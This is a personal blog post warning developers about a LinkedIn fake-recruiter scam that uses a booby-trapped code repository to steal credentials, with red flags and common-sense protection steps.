Before you dive in, make sure you'll start 2026 the right way. Track your new year resolutions in style, with the right tool. I built addTaskManager exactly for this, but you can use it to track finances, habits, anything.
In the last 3 months I’ve been targeted twice by a relatively sophisticated scam on LinkedIn. What follows is a short description of the pattern and some common sense steps you can take to avoid leaking your credentials.
The LinkedIn Scam Pattern
Both attempts started with a direct message from a recruiter. First thing I do when I get cold messaged is to look at the user’s LinkedIn history. Here are some red flags:
- recent account but with hundreds/thousands of followers (likely bots)
- very little publishing history (not too much posting / commenting)
- inconsistent work history (random companies stitched together for credibility)
Both these accounts were in good shape, which suggests they were initially legit accounts, which were compromised – and the right owners didn’t know, or didn’t report the takeover, so LinkedIn could block the accounts. So, some guys were initially scammed out of their LinkedIn accounts which were now operated by perpetrators. That was step 1.
Step 2 involves a proposal which looks slightly better than the market level, but still credible. Both scams pretend they had a project in the works, something very common, not a bright idea, just a project. I asked a few questions about the company, the answers were again credible. It’s worth noting that both attempts were conducted in perfect English. So, step 2 is engaging in the proposal.
Step 3 – here’s where everything happens – is setting up a meeting and offering some materials in preparation of the meeting. The meeting was set up via a legit Calendly link. And the prepping materials were in the form of a BitBucket repo, which I was supposed to download and install, so we could chat about the existing features.
From here on the things would go like:
- you clone the repo
- you install dependencies
- you add .env variables (the repo has calls to various APIs that require private keys)
- you run the code
- ka-boom – your credentials are gone in less than a second, because you just launched a backdoor
But it doesn’t have to be like this.
Common Sense Protection Measures
Both times I asked one of my agents to scan the repo in the remote site (not installing it). ChatGPT and Claude are really good at these things if you prompt them well. First time ChatGPT found it just by listing the files in the repo, second time I installed the repo and Claude found the exact point where the exfiltration was taking place, and described the mechanism in detail.
Here are a few basic, common sense protection measures:
- ask many questions first about the company and look for these red flags: fully remote team (no physical location), vague information about funding (the company doesn’t actually exist), how long the team has been around
- share as little information as possible during the messaging (ideally only what’s already in your LinkedIn profile, not more)
- when you get a meeting proposal, make sure you use legit apps (no custom video conferencing platforms, vanilla Calendly setup)
- when you get a repo, scan it first. I cannot emphasize this enough: do NOT run random repos on your machine, without scanning them first. It’s just a question of asking your favorite LLM to identify security holes, and ask them to look for: obfuscated code, suspicious npm/pip packages, or unusual postinstall scripts
The Boundaries Are Fading Away
AI is advancing at an incredible speed. Humans, not so much. The proportion of scammers / legit people is pretty much the same, but AI is making the boundary between good and bad guys almost invisible. The disguise is cheap and very effective. That’s one of the reasons your main behavior online should be don’t trust, verify.
We’ve been heading for this inflection point very slowly during the last 5-10 years. I know, because I’ve been studying machine learning before ChatGPT was cool, and back then it was still very difficult to mirror reality the way AI is mirroring it right now. Now we’re there. We’re in the middle of an AI generated fantasy world, where it’s almost impossible to find your way out, almost impossible to detect what’s fabricated from what’s real.
That’s why – and I will say this over and over – bio content, or provably human generated content will become not only more precious, but it will eventually aggregate itself in the foundation of a new, trustable world, separating itself from the Matrix.
I've been location independent for 15 years
And I'm sharing my blueprint for free. The no-fluff, no butterflies location independence framework that actually works.
Plus: weekly insights on productivity, financial resilience, and meaningful relationships.
Free. As in free beer.